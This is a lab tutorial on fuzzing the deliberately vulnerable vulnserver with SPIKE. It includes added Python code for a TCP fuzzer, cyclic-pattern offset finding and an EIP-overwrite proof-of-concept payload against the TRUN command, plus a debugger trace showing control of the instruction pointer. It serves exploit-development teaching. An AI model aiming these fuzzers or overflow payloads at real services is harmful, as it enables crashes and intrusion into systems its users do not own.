Fuzzing with Spike

Preparation

SPIKE ships with Kali; I used Kali 2017.1.

First download a deliberately vulnerable program, Vulnerable Server (vulnserver):

http://sites.google.com/site/lupingreycorner/vulnserver.zip
or from this mirror:
https://samsclass.info/127/proj/vulnserver.zip

Start the server.

With netstat -ano, or by reading the program's source code, you can see that it listens on port 9999.

A first trial

First create a test script. The first line sends a fixed string; the second is a variable string that SPIKE will replace with each of its fuzz strings in turn.

~/spikeFuzz/learn# cat test.spk 
s_string("giantbranch");
s_string_variable("giantbranch");

On another machine, listen with nc to act as the server: -v prints more detail, -l means listen, -p sets the port, and -k keeps listening after a client disconnects (otherwise nc exits as soon as the first connection closes).

nc -kvlp 6666

The tool we use is generic_send_tcp; running it with no arguments prints its usage. SKIPVAR is the index of the s_string_variable to start from and SKIPSTR the index of the fuzz string to start at, so 0 0 starts from the beginning.

root@kali:~/spikeFuzz/learn# generic_send_tcp 
argc=1
Usage: ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
./generic_send_tcp 192.168.1.100 701 something.spk 0 0

Start fuzzing

root@kali:~/spikeFuzz/learn# generic_send_tcp 192.168.xxx.xxx 6666 test.spk 0 0
Total Number of Strings is 681
Fuzzing
Fuzzing Variable 0:0
Fuzzing Variable 0:1
Variablesize= 5004
Fuzzing Variable 0:2
Variablesize= 5005
Fuzzing Variable 0:3
Variablesize= 21
Fuzzing Variable 0:4
Variablesize= 3
Fuzzing Variable 0:5
Variablesize= 2
Fuzzing Variable 0:6
Variablesize= 7
Fuzzing Variable 0:7
Variablesize= 48
Fuzzing Variable 0:8
Variablesize= 45
Fuzzing Variable 0:9
Variablesize= 49

Check the server side

Fuzzing vulnserver for real

After connecting with nc we can see the commands the server supports:

~# nc 192.168.52.143 9999
Welcome to Vulnerable Server! Enter HELP for help.
HELP
Valid Commands:
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

The referenced article fuzzes the TRUN command, so the script first reads the banner line and then sends TRUN followed by a variable string:

s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");

After attaching Immunity Debugger to the server process, start fuzzing:

root@kali:~/spikeFuzz/learn# generic_send_tcp 192.168.52.138 9999 trun.spk 0 0

Very soon EIP is overwritten.

This time, also capture the traffic with Wireshark.

The crash came from the connection whose client port was 58644, so filter on that port and follow the TCP stream:

tcp.port == 58644

That should be the packet that caused the crash.
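The same loop written out as an added Python example (this is not SPIKE's code and not from the referenced article), so the mechanics of generic_send_tcp are visible: one s_string_variable is replaced by each fuzz string in turn while the fixed parts stay constant, SKIPVAR/SKIPSTR pick where to resume, and, the part the Wireshark step above is working around, every payload is written to disk before it is sent, so the bytes that killed the server are on hand without a capture. The host and port are the page's 192.168.52.138:9999; FUZZ_STRINGS is a small constructed subset modelled on SPIKE's built-in list (the first two entries are sized to match the Variablesize=5004/5005 lines earlier), and the reply check only assumes that a live vulnserver answers every request.

```python
import socket

# Constructed subset modelled on SPIKE's built-in fuzz strings (the real tool
# walks 681 of them); the first two match the Variablesize=5004/5005 lines above.
FUZZ_STRINGS = [
    b"/.:/" + b"A" * 5000,
    b"/.../" + b"A" * 5000,
    b"/" + b"." * 19 + b"/",
    b"%n" * 10,
    b"%s" * 20,
    b"A" * 10000,
    b"\x00" * 64,
    b"-1",
    b"0xfffffffff",
]


def fuzz_cases(parts, fuzz_strings, skipvar=0, skipstr=0):
    """Expand a SPIKE-style script into (case, payload) pairs.

    parts is a list of ("string", bytes) and ("variable", bytes) entries,
    mirroring s_string() and s_string_variable(); a variable's bytes are its
    default value. Exactly one variable is replaced per case, the rest keep
    their defaults. Case index 0 of each variable is the default itself, which
    is why the SPIKE output above prints no Variablesize for "0:0". skipvar and
    skipstr behave like generic_send_tcp's SKIPVAR/SKIPSTR: start at that
    variable and, for that variable only, at that fuzz-string index.
    """
    var_positions = [i for i, (kind, _) in enumerate(parts) if kind == "variable"]
    for v, pos in enumerate(var_positions):
        if v < skipvar:
            continue
        candidates = [parts[pos][1]] + list(fuzz_strings)
        first = skipstr if v == skipvar else 0
        for s in range(first, len(candidates)):
            payload = b"".join(
                candidates[s] if i == pos else value
                for i, (_, value) in enumerate(parts)
            )
            yield (v, s), payload


def tcp_sender(host, port, timeout=3.0, read_banner=True):
    """Build send(payload) -> bool for a line-oriented TCP service.

    read_banner plays the role of s_readline(): vulnserver greets every
    connection with a welcome line that must be consumed first. Returns True
    when the server answered, False when the connection was refused, reset or
    timed out, i.e. the target is probably dead or wedged.
    """
    def send(payload):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                if read_banner:
                    s.recv(4096)
                s.sendall(payload)
                s.recv(4096)  # a healthy server replies to every request
            return True
        except OSError:  # ConnectionRefusedError, ConnectionResetError, timeout
            return False
    return send


def run_fuzz(cases, send, log_path="last_payload.bin"):
    """Send cases in order and stop at the first one the server does not answer.

    The payload is written to log_path *before* sending, so when the target
    crashes the exact bytes are already on disk (no Wireshark needed).
    Returns (case, payload) for the suspect case, or None if all were answered.
    """
    for case, payload in cases:
        if log_path:
            with open(log_path, "wb") as f:
                f.write(payload)
        print("Fuzzing Variable %d:%d  payload=%d bytes" % (case[0], case[1], len(payload)))
        if not send(payload):
            return case, payload
    return None


# trun.spk from the page: s_readline(); s_string("TRUN "); s_string_variable("COMMAND");
TRUN_SCRIPT = [("string", b"TRUN "), ("variable", b"COMMAND")]

if __name__ == "__main__":
    # Same arguments as: generic_send_tcp 192.168.52.138 9999 trun.spk 0 0
    hit = run_fuzz(fuzz_cases(TRUN_SCRIPT, FUZZ_STRINGS, 0, 0),
                   tcp_sender("192.168.52.138", 9999))
    if hit:
        print("server stopped answering at case %s (%d bytes), saved in last_payload.bin"
              % (hit[0], len(hit[1])))
```

Why TRUN falls over on the very first case is a detail of vulnserver's source rather than something the page states: the TRUN handler only hands the input to its unsafe copy when the argument contains a '.', and SPIKE's first fuzz strings begin with "/.:/", so case 0:1 already walks straight into it.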

Generate a cyclic pattern to locate the offset:

!mona pattern_create 2008

EIP is overwritten with 6f43376f, which puts the offset at 2002. Debugging again with four B bytes placed at that offset, the crash lands on 0x42424242:
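The arithmetic behind !mona pattern_create and pattern_offset, as an added Python example (not mona's code and not from the article): it builds the same cyclic pattern, recovers the offset from the EIP value by reading the register little-endian, and then builds the check payload with four B bytes at that offset, which is what produces the 0x42424242 frame in the kv output below. The prefix in front of the pattern is an assumption, since the page does not show the leading bytes of the crashing packet; use whatever prefix your own crash had, because the offset is measured from the start of the pattern, not from the start of the packet.

```python
import string
import struct

PATTERN_ALPHABET = (string.ascii_uppercase, string.ascii_lowercase, string.digits)


def pattern_create(length):
    """Cyclic pattern in the Metasploit/mona style: Aa0Aa1...Aa9Ab0...

    Every 4-byte window is unique up to 20280 bytes (26*26*10 triplets of 3),
    which is what lets a single register value map back to one offset.
    """
    out = bytearray()
    for upper in PATTERN_ALPHABET[0]:
        for lower in PATTERN_ALPHABET[1]:
            for digit in PATTERN_ALPHABET[2]:
                for ch in (upper, lower, digit):
                    if len(out) == length:
                        return bytes(out)
                    out.append(ord(ch))
    if len(out) == length:
        return bytes(out)
    raise ValueError("a pattern longer than %d bytes is no longer unique" % len(out))


def pattern_offset(pattern, eip, little_endian=True):
    """Offset of the bytes that landed in EIP, or None if they are not in the pattern.

    x86 is little-endian, so EIP=0x6f43376f means the bytes "o7Co" (6f 37 43 6f)
    sat on the stack in that order; search for them in that order.
    """
    needle = struct.pack("<I" if little_endian else ">I", eip)
    idx = pattern.find(needle)
    return idx if idx != -1 else None


def eip_check_payload(prefix, offset, filler=b"A", marker=b"BBBB"):
    """prefix + filler up to the offset + a 4-byte marker that should show up in EIP."""
    return prefix + filler * offset + marker


if __name__ == "__main__":
    pat = pattern_create(2008)                 # !mona pattern_create 2008
    off = pattern_offset(pat, 0x6f43376f)      # EIP observed in the debugger
    print("offset", off)                       # 2002
    # Assumed prefix: the page does not show the crashing packet's leading bytes.
    poc = eip_check_payload(b"TRUN /.:/", off)
    print(len(poc), poc[-4:])
```

If pattern_offset returns None, the register did not come from the pattern at all (a pointer into it, a partially overwritten value, or a different buffer), and the offset has to be found with a different marker rather than guessed.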

0:001> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
017ef9dc 0033000a 00333878 00000bb8 00000000 0x42424242
017ef9f0 77d3517e 768b6767 00000000 00000000 0x33000a
017efa18 77cc349f 017efb04 77c8d74d 00398dff ntdll!RtlpNtMakeTemporaryKey+0x43ba
017efa2c 77d3517e 77cf7d96 00510000 502c016b ntdll!RtlTryEnterCriticalSection+0x98f
017efa30 77cf7d96 00510000 502c016b 77cc349f ntdll!RtlpNtMakeTemporaryKey+0x43ba
017efa3c 77cc349f 768b6643 7ffdd000 00000000 ntdll!RtlTimeToElapsedTimeFields+0xe902
017efb10 77cc349f 77cc34ca 00000208 00000000 ntdll!RtlTryEnterCriticalSection+0x98f
017efb14 77cc34ca 00000208 00000000 00000000 ntdll!RtlTryEnterCriticalSection+0x98f
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\system32\WS2_32.DLL -
017efb3c 7638140a 5d13f74a 017efc84 00000000 ntdll!RtlTryEnterCriticalSection+0x9ba
00000000 00000000 00000000 00000000 00000000 WS2_32!Ordinal490+0x140a

The cause is a strcpy deliberately written into the program: the TRUN handler copies the input into a fixed-size stack buffer without checking its length, so a long argument runs past the buffer and overwrites the saved return address.

Reference

https://samsclass.info/127/proj/p18-spike.htm
